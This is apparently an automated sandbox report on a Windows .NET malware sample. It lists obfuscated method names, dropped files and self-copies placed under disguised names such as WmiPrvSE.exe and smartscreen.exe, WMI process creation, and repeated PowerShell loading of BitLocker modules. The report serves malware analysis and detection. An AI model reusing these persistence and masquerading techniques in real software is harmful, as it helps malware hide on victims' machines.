                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BbO7wWS5cxbaGymyVbQ.csHigh entropy of concatenated method names: 'jdUS4boB4I', 'wssKhsUpx92nGOr8XEwn', 'hRojH8UpwamoPjTipI1C', 'zMv7M8UpSjqckiDSHEBX', 'kOEV2aUpIXebeDKpg54q', 'LgDjFHUpgBMhjO47DowU', 'F8DSPUx2mF', 's4nq6AUp87Sltl8KpXnS', 'aK0VniUpU0KaxmqJVjEC', 'mHAQMnUpBkPiOX2yTYiw'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, sKiPk9lWXTPvVeyXn6A.csHigh entropy of concatenated method names: 'Sorlis9WK3', 'pt6lrQ8MCE', 'GdalmIpogu', 'SjGl0QQwy7', 'HP5ly6Rt5O', 'aXflbwYqba', 'nsERYAUO68A6RfL0lNda', 'LCdaSTUOsbxjMeHgAHW0', 'rPruBwUONAAUs3lEY9tW', 'snrlOoUOF5Dh1VrcfuqJ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vt7VlxUKgERWgHKui7j.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'DoSUIqfwXWm', 'n6rU8F0761x', 'tMuNb7UVMHDa5rHfUd17', 'MSU3U8UVVp0DX759vJxA', 'CBm69qUVCfxGjmX4nxKS'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, HQveK2TZPpdYlbbymFh.csHigh entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, snIgnG8supNNqgnWjmn.csHigh entropy of concatenated method names: 'd3F8dbEBCp', 'KoXWoHU4ulswcmd21WLa', 'PRRfRxU4HnJxBmXKfHNJ', 'o8aIMGU4pv9kRTw3IDML', 'XRY8FxuCQ8', 'vl2lEsU4ViXHZ8tixyh8', 'E6Mtl8U4CAr2VCfjrOL3', 'vZPXqgU49t40nRij7vr5', 'mrxew9U4M6ymGJMgwAsW', 'cm6Ht9U44NMEt8bOb2Gv'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AguDZvV8XAU4A2bj0tF.csHigh entropy of concatenated method names: 'N0GVvydwVT', 'QOBVtyxOnv', 'l3JVSGn6Wf', 'xxPVIvMTGh', 'GOcVx2grMp', 'iNVJVNUhQOup9pGYLbF9', 'JuOcLAUhJYq5Kjxf6N6R', 'pOu1ZbUhOvDQNruDcSbT', 'IYCD0cUhXA288K9mlyCd', 'B93QQrUhzADOgZJs325a'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, SDxgkMCGswquS2gCb1c.csHigh entropy of concatenated method names: 'ASFCZWFaMF', 'pc7C5cLcJ5', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'rj4C1Yrr6D', '_96S', '_9s5'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T3ia1E48vbq77NC5FPX.csHigh entropy of concatenated method names: 'aP04vwdSjZ', 'IbB4to1eya', '_7Bm', 'QMM4Sa5q7C', 'PNu4IW7AWk', 'hQG4xXlJIZ', 'zNH4wibUlu', 'BY9cEeUs3nrQZKUsi1NO', 'E4n58jUsjmMe6WLFTpAZ', 'QQ59SkUsTkdpFgnDbsEp'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, bjtl9nU91QXO1mQ3ZQk.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'JmVUIm6bCgZ', 'n6rU8F0761x', 'G2683yUMeDZ3AWYEVA96', 'wAXVxqUMlsM7sGLxS8Tq', 'BhcqD7UMK9mmMdHmeErg'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, UkYMyN0ZW1dmGHQjV7r.csHigh entropy of concatenated method names: 'Toc0htSZfv', 'YO901GbThj', 'Mu10PrGWuH', 'sPe09ZYweM', 'hsP0MPav5v', 'etj0VAMX4n', 'Ty60CjxleJ', 'cQ9041s8mV', 'rST0oEI9jV', 'N1f0uKGAhi'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i9aBvAta7NQBu7uYGHI.csHigh entropy of concatenated method names: 'iHASRdExvc', 'LvTSUdAfqN', 'HhTSBVWs5p', 'kJc4xnUHNdkoSwUr1J7e', 'dn68ywUH6y4NIPKopeN1', 'KPLcN7UHslW7STTa8B33', 'CVvmTfUHFJguqsZa90s1', 'lfut69iUQ5', 'MqxtsSK5ma', 'uAjtNcvjOl'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BvKdSKz6i3GiqDst4c.csHigh entropy of concatenated method names: 'FfnUUY5j6G', 'TToU8abIp7', 'RKjUYKyvSh', 'lahUvcYkkg', 'tGSUtJ8LJo', 'IPNUS29aXd', 'bvcUxCe6io', 'zpA38sUMMGgsvp2Lxpsb', 'CeNY2YUMVwJfKDltB821', 'EJ4WU1UMCHZTwEgl4Sic'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PZVO9XQyvEW6EWkCOTf.csHigh entropy of concatenated method names: 'bIKBvN28j2l', 'xo4BvFLo7O9', 'TZfq6pUQJauc3XhIRtPV', 'CGIVMxUQOsXbeiZ4BkJm', 'kdybQZUQQWwFoHKuuiwm', 'TCDAqjUQXlWm99iQWlNR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, TkDPMiDomfmP4gpyrHD.csHigh entropy of concatenated method names: 'N9xDpOgE4f', 'jTvDLXHqgQ', 'r3DDnjiTtd', 'mQ2DktrUTJ', 'UcADEOjXU5', 'dcLDaZPdtn', 'CEKDhTjfWU', 'WIUD6DSdXb', '_0023Nn', 'Dispose'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, mYFGYuDPPnsRtlgYXSW.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lhNDMj4EEP', 'FIH638UKComVDuN6cq99', 'iRpYpUUK4tO0ZJmNAjle', 'MMIn0SUKodQOemVVnveb', 'FQv5CZUKubr4oaAoIMVL', 'yHBvuwUKH91cZc5nhyH7', 'i87c95UKppdsiYwMErOE'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tADCkJrqTU2Q0HlBmnu.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'VsZrGwIFo4', '_947', 'hWMr7v7Bsw', 'hbYrZQuTjQ', '_1f8', '_71D'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, EPRO5exbMxYgPbrcZqi.csHigh entropy of concatenated method names: '_816', 'd65', 'DEKUYSBdXe1', 'VT1UYIBdlw4', 'xojUI1gJC4N', 'zp2UYRcxbBk', 'W4TtXgUjFcrpehRVRTkw', 'f2eW0UUjDLUGCQcIN8yP', 'NTYadEUjsUh6Fw72rtxk', 'YcS3SjUjNPZrEmy3G5sk'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AvuW0DDJgLKXlqANM9u.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'qhNDQnDMRG', 'CEvDXUaWan', 'FjcDz8RTEW', '_0023Nn', 'Dispose', 'D4mXg3UKeZISJbAYpF1A', 'EJcGulUKllHl4hxXwcYH'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JnrFR3NDGj5Umdksxhf.csHigh entropy of concatenated method names: 'DFgNebXbnF', 'VRoNlgeGxv', 'PyoNKvokZj', 'ssCNJbdI0v', 'DxmNOG4ELF', 'tdlNQApnR8', 'n0MNXa4gI6', 'm13Nz7yM6T', 'P7OFRfjJCi', 'j20FU8i99W'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WucFfiouWiCvvghLiuF.csHigh entropy of concatenated method names: 'K2KopQ8aif', 'i11ojTBSfe', 'DxGoTKwqPi', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'DD2o39SgaR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BYTOxCSlRf8d8PbhFkH.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'kYCwnWUpj3o2XpH0hFHS', 'jQNGwtUpTk7kTx7BNuX5', 'iUg5W6Up34bG03GHSIcH', 'VdEKFPUpLkNExZh0UWD5'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LkJErlBmfuQbEQI7Dva.csHigh entropy of concatenated method names: 'uDbByuyiil', 'cBrBbuwvw1', 'hncRK2UVJeemPSTsHj66', 'nNUt10UVlq6kQZtPl6BY', 'mj2NLAUVKRnhWPwhWDvL', 'WRjjICUVOHBdHivZc286', 'tq9XJNUVQ0KU0ofDFasn', 'wxICpHUVXehDSZWWLZBv', 'CKr2DnUVzuevHCNGCsgj', 'blcSOAUCRER8chNlUjvs'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ka9Gk8eYX7oddSeBxPu.csHigh entropy of concatenated method names: 'pRaetFQs7h', 'gL0eSmKwYa', 'mggeIdMYyp', 'vpoexQIE3M', 'NO2ewPAw5Q', 'JJaegdyyC1', 'akkeWN8p1n', 'QHZeAFdqiO', 'CjceiKYmxO', 'GEZerQCUci'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ynNMdxtSlP068ZfCbEy.csHigh entropy of concatenated method names: 'kFSt2GLOgy', 'dMPtGS9IkZ', 'Pmj657UHSY8wRHjoK73j', 'euvWK1UHvgfmdXeevhQW', 'GegCGoUHtx5CfjyqaidI', 'XhTv4uUHI8hf5IChQ0rZ', 'MLetysg2oX', 'pPytbA8dOw', 'ISWXtEUH8PiQeoMQxwx1', 'cJkNfyUHUueU1gwFK0YZ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, f0273NpsOBkB35M3Fcd.csHigh entropy of concatenated method names: '_25r', 'h65', 'ysYpFWHj0y', 'IcQpDfrpOk', 'f23pd9Sp7H', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wkXiTKeERMVdYVr8C01.csHigh entropy of concatenated method names: 'C0sehqyPsj', 'l8Se6TgcRU', 'rVIesETM53', 'rXQeNBOeq8', 'LgxeFkbtKr', 'Ru7eDU38Vw', 'GlfedUwMUu', 'JbGeeucbP9', 'Tcr7ROUOZ5CJMIT0YcvF', 'ymULXoUOGxSv0UxV2TwJ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jKDEdMg4pSELQIYm4Ef.csHigh entropy of concatenated method names: 'XwvAqFLkE7', 'JNBHBtULhvgCXjrsJR8R', 'Qg4mmkULEXY9YpJKb8HN', 'hDJDBpULavHG0nbt8t8E', 'Vdjgu5lhIM', 'neWgHibRSS', 'hGEgporqv4', 'edMgjuMrqJ', 'COagT7IvD0', 'KIdg3tILjP'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lX8j2AB4QZ617OouKwU.csHigh entropy of concatenated method names: 'j0UBfE0C1R', 'QKtSa9UCbmjkSA7yX7T0', 'yW5YlSUC0pQqdpxwUul2', 'zBsSfOUCyYac24gJKwch', 'F9JQhtUCqpUtdJrRyWRL', 'RjhqXAUC23eC0DaOJjSM', 'cU5MMJUCGQ3MOuV0qUD6', 'LkDBujAoWH', 'hlFBHRTfpS', 'EcPBpGsGho'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pxw1SGV2fdojUI1JXeH.csHigh entropy of concatenated method names: 'plDV7AoG9M', 'dBTVZN4Iwy', 'kTMV5agsuo', 'v29V1nFIcj', 'sX7VPuShV3', 'rMjV9XHooa', 'DIeYbJU62sB30Ft0vZLT', 'qaC7y7U6b1HmXjUpLlnF', 'fBAsrjU6q7fbnI0NsnRP', 'AeFU0LU6GWskBfNhIXKD'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5NKhLy17ibJYUQjat.csHigh entropy of concatenated method names: 'JPxpfSB2e', 'TkTEnhU9KttmZTWeHocH', 'kOmx1gU9e1ifoCoUUXYP', 'YKbo67U9lYLY4iavrwQ5', 'yWbXjuU9JhsVYwWRxkQv', 'MOLqujRan', 'pIW2dAA5y', 'BvAG6cRQi', 'MHk73LE85', 'l6FZR3opI'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BoKyWKdAmvbd2b2RMwn.csHigh entropy of concatenated method names: 'VSmUt3LohcH', 'nOuUtLpR3ss', 'e97UtcbLJbj', 'PhkVVKUJpBFdRgeBKiLR', 'yE2jBoUJu2b1s2ESHytF', 'iJtFGxUJHHefsc49ckjJ', 'ofKUI6ZGnvu', 'nOuUtLpR3ss', 'WjKkMoUJLgJ3KQybqftD', 'kiKKIIUJTPHeG92HABwl'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IJJw9EvAOuvS43y66rB.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'M3FUIGVFiiA', 'Er0U8zHOTet', 'vd2uPNUuINX1cSlsBnHk', 'Q21nhRUuxLutwTnRneJM', 'FmJycEUuwsbCYeipGYc0', 'YKZQjKUuguHqOwSiGHRd', 'EyVftiUuWMpViZoGWLfj'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LdTxK5idbydrif7a5IA.csHigh entropy of concatenated method names: 'BuGil27VDy', 'ItIiKNiJds', 'qLJiJM2XIc', 'vyWiOkrEYB', 'WBYiQadbv3', 'X29hl8UccMncTWYQXncE', 'DuEge7Uc3r1bCfDV4W2i', 'AtvQsEUcLVgPITATCnoY', 'TNftiZUcfo976f7UL0me', 'ToEosSUcnJvUlB1JRC9S'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L526CTiuqPoUqFeb8LJ.csHigh entropy of concatenated method names: 'j9l', 'muJipB5bsr', 'rNMijgruKN', 'dnBiTkekVY', 'm42i3AZrm4', 'Ft3iLnCOpc', 'wP9icK7ADP', 'TLhEwlUc95oJqRIM4Id3', 'YiVkGaUc1HNdrd5uwZ4i', 'RBwYPtUcPKcg2jNYe6Cl'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\stDzyxQe.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\yuQrGMvY.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\uDZAyPvf.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\gUHludjC.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\PwjnMVKl.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fcdLmHlJ.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\rreJQTki.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\ylgZbdUT.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\ttRrlCpd.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\EhviVOkL.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\aceLSxeO.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\KIRpkYvx.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\FNQYcsFE.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\WyUWCOVc.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\QyIevzpi.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\hILtgrfA.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VoMNpBPa.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\DhiqiJKM.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\wjuqGuQY.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Recovery\WmiPrvSE.exe
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Downloads\smartscreen.exe
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\VWRNVcdg.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\bmmUfKkQ.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\RGFoMnqm.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\nGlBWAAq.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\IUzpLFaA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\ArFrORkS.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\sBnSdgqk.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\qDaBeGpk.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\yuQrGMvY.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\uDZAyPvf.log
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\stDzyxQe.log
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\gUHludjC.log

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
